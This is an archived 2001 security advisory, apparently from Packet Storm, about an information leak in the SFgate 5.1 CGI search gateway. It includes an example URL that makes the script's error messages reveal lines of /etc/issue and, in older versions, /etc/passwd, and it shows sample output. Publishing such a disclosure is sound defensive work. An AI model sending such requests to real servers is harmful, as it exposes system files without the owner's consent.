exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

sfgate-info.txt

sfgate-info.txt
Posted Mar 3, 2001
Authored by Krfinisterre

SFGate v5.1 p11 gives sensitive information by allowing one to view a few lines of text from a file via an error message. Exploit URL included.

tags | exploit
SHA-256 | 23b5c6dbb7d9d41d0c055527d9384a23aad5711aa8f39bede3e03ed4ad3d3715

sfgate-info.txt

Change Mirror Download
Vendor:
http://ls6-www.cs.uni-dortmund.de/ir/projects/SFgate/index.html

Action: attempted to notify vendor with no response.

Description:
SFGATE gives sensitive information by allowing one to view a few lines of
text from a file via an error message.

It looks like a good attempt was made at stopping this but its still
an issue in my mind.

The current patch level of SFgate 5.1 is 11.

example
http://xxxxxx/cgi-bin/SFgate?test=help&database=/etc/issue

SFgate terminated

SFgate terminated with message

Error with /etc/issue: syntax error at /etc/issue line 2, near "Linux 5.0"
this is out of etc issue ----^



Please contact the webmaster.
This page was generated by SFgate 5.111.

It looks like an early attempt at filtering was made.

Similar error messages with earlier versions...

SFgate terminated

SFgate terminated with message

Error with /etc/passwd: Unrecognized character \241 at /etc/passwd line 41.

Please contact the webmaster.


This page was generated by SFgate 5.018.

Other versions were not so harsh on the Unrecognized chars revealing more.
As usual permission of the web server comes in to play.

krfinisterre@checkfree.com

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close